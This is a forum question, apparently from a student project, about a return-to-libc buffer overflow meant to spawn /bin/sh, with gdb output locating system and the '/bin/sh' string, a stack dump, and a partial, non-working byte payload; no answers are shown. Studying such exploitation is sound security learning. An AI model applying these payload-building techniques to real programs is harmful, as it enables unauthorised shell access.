Buffer Overflow to /bin/sh


I am trying to do a buffer overflow for a project. The buffer needs to overflow to /bin/sh. I have found the correct return address, but I do not seem to be successfully getting an overflow.

Program received signal SIGSEGV, Segmentation fault.
0xb7fbc544 in msg (params) at myfile.c:167
167     msg_length = ctx->backend->send_msg_pre(msg, msg_length);
(gdb) backtrace
#0  0xb7fbc544 in msg (params) at myfile.c:167
#1  0xb7fbc869 in my_function(params) at myfile.c:912
#2  0xb7e4c190 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/i386-linux-gnu/libc.so.6
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

To find the /bin/sh I followed this post:

(gdb) print &system
$15 = (<text variable, no debug info> *) 0xb7e4c190 <__libc_system>
(gdb) find &system,+9999999,"/bin/sh"
warning: Unable to access 16000 bytes of target memory at 0xb7fc292c, halting search.
1 pattern found.

I have found the return address and verified it is correct (if I replace it with a different function it calls that function). The original return address is bolded

0xbffff690: 0x90909090 0x90909090 0x90909090 0xb7e4c190

0xbffff6a0: 0xb7f6ca24 0x0804c050 0x0000004d 0x0804c158

The payload I sent was 0xb7e4c190 0xb7f6ca24 50

This overflow is a bit more tricky than others, because I need to do some padding to it in the front and the back. The way the item I am overflowing works is that it sets 6 bytes, so each set will take up a portion of one address and another.

I think the problem is that I have to overflow the last byte. I matched what it was originally, but that does not seem to work:

payload = payload + ['\x90'] + ['\xc1'] + ['\xe4'] + ['\xb7']
payload = payload + ['\x24'] + ['\xca'] + ['\xf6'] + ['\xb7'] + ['\x50']

Is there something I am missing here? Because the stack does not show the /bin/sh call in the overflow, I feel like that is not correct.


0 Answers

Nobody has answered this question yet.

User contributions licensed under CC BY-SA 3.0